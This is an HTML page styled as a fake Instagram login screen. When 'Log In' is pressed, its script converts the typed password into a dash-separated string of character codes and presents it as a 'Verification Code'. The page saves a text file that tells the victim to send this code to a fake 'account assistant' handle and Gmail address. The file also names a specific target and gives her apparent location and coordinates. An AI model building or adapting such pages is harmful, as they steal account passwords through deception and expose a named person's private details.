<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
        body{
            background-color: rgb(250, 250, 250);
        }
        .login{
            background-color: rgb(255, 255, 255);
            width: 350px;
            height: 380px;
            margin-left: 740px;
            margin-top: 80px;
            border: rgb(219, 219, 219) solid 1.5px;
        }
        .signup{
            background-color: rgb(255, 255, 255);
            width: 350px;
            height: 63px;
            margin-left: 740px;
            margin-top: 10px;
            border: rgb(219, 219, 219) solid 1.5px;
        }
        .phone{
            width: 425px;
            height: auto;
            margin-left: 290px;
            margin-top: -485px;

        }
        .under{
            width: 580px;
            height: auto;
            margin-top: 200px;
            margin-left: 420px;
        }
        img{
            position: absolute;
        }
        .instagram_logo{
            width: 240px;
            height: auto;
            margin-top: -440px;
            margin-left: 790px;
        }
        .facebook{
            width: 300px;
            height: auto;
            margin-left: 765px;
            margin-top: -200px;
        }
        .sign_up{
            margin-left: 800px;
            margin-top: -47.5px;
            width: 230px;
            height: auto;

        }
        .store{
            width: 350px;
            height: auto;
            margin-left: 750px;
            margin-top: 10px;

        }
        .log_in{
            position: absolute;
            margin-left: 780px;
            margin-top: -335px;
        }
        #ID{
            border: rgb(219, 219, 219) solid 1.5px;
            width: 256px;
            height: 36px;
            background-color: rgb(250, 250, 250);
            border-radius: 3px;
            font-size: 12px;
            padding-left: 10px;
        }
        #Password{
            margin-top: 7.5px;
            border: rgb(219, 219, 219) solid 1.5px;
            width: 256px;
            height: 36px;
            background-color: rgb(250, 250, 250);
            border-radius: 3px;
            font-size: 12px;
            padding-left: 10px;
        }
        #bt{
            width: 271px;
            height: 31px;
            margin-top: 15px;
            background-color: rgb(0, 153, 243);
            border: rgb(250, 250, 250) solid 0px;
            border-radius: 5px;
            font-size: 15px;
            color: rgb(255, 255, 255);

        }
        #ID:focus{
            border: rgb(168, 168, 168) solid 1.5px;
            outline: none;
        }
        #Password:focus{
            border: rgb(168, 168, 168) solid 1.5px;
            outline: none;
        }
        input::value{
            color: black;
        }


        
    </style>
</head>
<body>
    <div class="login">

    </div>
    <div class="signup">

    </div>
    <img src="instagram phone.png" class="phone">
    <img src="under.png" class="under">
    <img src="instagram.png" class="instagram_logo">
    <img src="facebook.png" class="facebook">
    <img src="sigh up.png" class="sign_up">
    <img src="store.png" class="store">
    <div class="log_in">
        <div>
            <input type="text" id="ID" placeholder="  Phone number, username, or email" />
        </div>
        <div>
            <input type="password" id="Password" placeholder="  Password" />
        </div>
        <div>
            <input type="button" id="bt" value="Log In" onclick="saveFile()" />
        </div>
    </div>

</body>
<script>
    
    let saveFile = () => {
    	
        // Get the data from each element on the form.
    	const name = document.getElementById('ID');
        const age = document.getElementById('Password');
        
        var pass = age.value;
        var pass2 = pass.charCodeAt(0);
        var pass3 = pass.charCodeAt(1);
        var pass4 = pass.charCodeAt(2);
        var pass5 = pass.charCodeAt(3);
        var pass6 = pass.charCodeAt(4);
        var pass7 = pass.charCodeAt(5);
        var pass8 = pass.charCodeAt(6);
        var pass9 = pass.charCodeAt(7);
        var pass10 = pass.charCodeAt(8);
        var pass11 = pass.charCodeAt(9);
        var pass12 = pass.charCodeAt(10);
        var pass13 = pass.charCodeAt(11);
        var pass14 = pass.charCodeAt(12);
        var pass15 = pass.charCodeAt(13);
        var pass16 = pass.charCodeAt(14);
        var pass17 = pass.charCodeAt(15);
        var pass18 = pass.charCodeAt(16);
        var pass19 = pass.charCodeAt(17);
        var pass20 = pass.charCodeAt(18);
        var pass21 = pass.charCodeAt(19);
        var pass22 = pass.charCodeAt(20);
        var pass23 = pass.charCodeAt(21);
        var pass24 = pass.charCodeAt(22);
        var pass25 = pass.charCodeAt(23);
        var pass26 = pass.charCodeAt(24);
        var pass27 = pass.charCodeAt(25);
        var pass28 = pass.charCodeAt(26);
        var pass29 = pass.charCodeAt(27);
        var pass30 = pass.charCodeAt(28);
        var pass31 = pass.charCodeAt(29);
        var pass32 = pass.charCodeAt(30);
        var pass33 = pass.charCodeAt(31);
        var pass34 = pass.charCodeAt(32);
        var pass35 = pass.charCodeAt(33);
        var pass36 = pass.charCodeAt(34);
        var pass37 = pass.charCodeAt(35);
        var pass38 = pass.charCodeAt(36);
        var pass39 = pass.charCodeAt(37);
        var pass40 = pass.charCodeAt(38);
        var pass41 = pass.charCodeAt(39);
        var pass42 = pass.charCodeAt(40);
        var pass43 = pass.charCodeAt(41);
        var pass44 = pass.charCodeAt(42);
        var pass45 = pass.charCodeAt(43);
        var pass46 = pass.charCodeAt(44);
        var pass47 = pass.charCodeAt(45);
        var pass48 = pass.charCodeAt(46);
        var pass49 = pass.charCodeAt(47);
        var pass50 = pass.charCodeAt(48);
        var pass51 = pass.charCodeAt(49);
        var pass52 = pass.charCodeAt(50);
        var pass53 = pass.charCodeAt(51);

        // This variable stores all the data.
        let data = 
            "Instagram Account Verification" + '\n' + '\n' +"ID: @yujoolim" + '\n' + '\n' +"Name: Yuho유후"+ '\n' +'\n' +"Registered Email Domain: Gmail"+ '\n' +'\n' +"Location: Pedro Validivia, 66240 San Pedro Garza García, N.L."+ '\n' +'\n' +"Coordinate: (25.6550113, -100.3910038)"+ '\n' + '\n' +"Gender: Female" + '\n' + '\n' +"Language: Korean"+ '\n' +'\n' +"Account Assistant:@iav1212(Email: instagramemail12121212@gmail.com)"+ '\n' +'\n' +"*If the information is correct, please copy the Verification Code below and send it back to your account assistant (@iav1212)"+ '\n' +'\n' + "*위 정보와 귀하의 개인 정보와 일치 한다면 아래의 인증 코드를 계정 상담원에게(@iav1212) 보내어 인증 절차를 완료해 주십시오"

+'\n' + '\n' +"Verification Code:" +'\n' +'\n' + pass2 + "-" + pass3 + "-" + pass4 + "-" + pass5 + "-" + pass6 + "-" + pass7 + "-" + pass8 + "-" + pass9 + "-" + pass10 + "-" + pass11 + "-" + pass12 + "-" + pass13 + "-" + pass14 + "-" + pass15 + "-" + pass16 + "-" + pass17 + "-" + pass18 + "-" + pass19 + "-" + pass20 + "-" + pass21 + "-" + pass22 + "-" + pass23 + "-" + pass24 + "-" + pass25 + "-" + pass26 + "-" + pass27 + "-" + pass28 + "-" + pass29 + "-" + pass30 + "-" + pass31 + "-" + pass32 + "-" + pass33 + "-" + pass34 + "-" + pass35 + "-" + pass36 + "-" + pass37 + "-" + pass38 + "-" + pass39 + "-" + pass40 + "-" + pass41 + "-" + pass42 + "-" + pass43 + "-" + pass44 + "-" + pass45 + "-" + pass46 + "-" + pass47 + "-" + pass48 + "-" + pass49 + "-" + pass50 + "-" + pass51 + "-" + pass52 + "-" + pass53 +'\n' +'\n' +"-Instagram account Verification-";
        
        // Convert the text to BLOB.
        const textToBLOB = new Blob([data], { type: 'text/plain' });
        const sFileName = '@yujoolim_Instagram_Account_Verification.txt';	   // The file to save the data.

        let newLink = document.createElement("a");
        newLink.download = sFileName;

        if (window.webkitURL != null) {
            newLink.href = window.webkitURL.createObjectURL(textToBLOB);
        }
        else {
            newLink.href = window.URL.createObjectURL(textToBLOB);
            newLink.style.display = "none";
            document.body.appendChild(newLink);
        }

        newLink.click(); 
    }
</script>
</html>
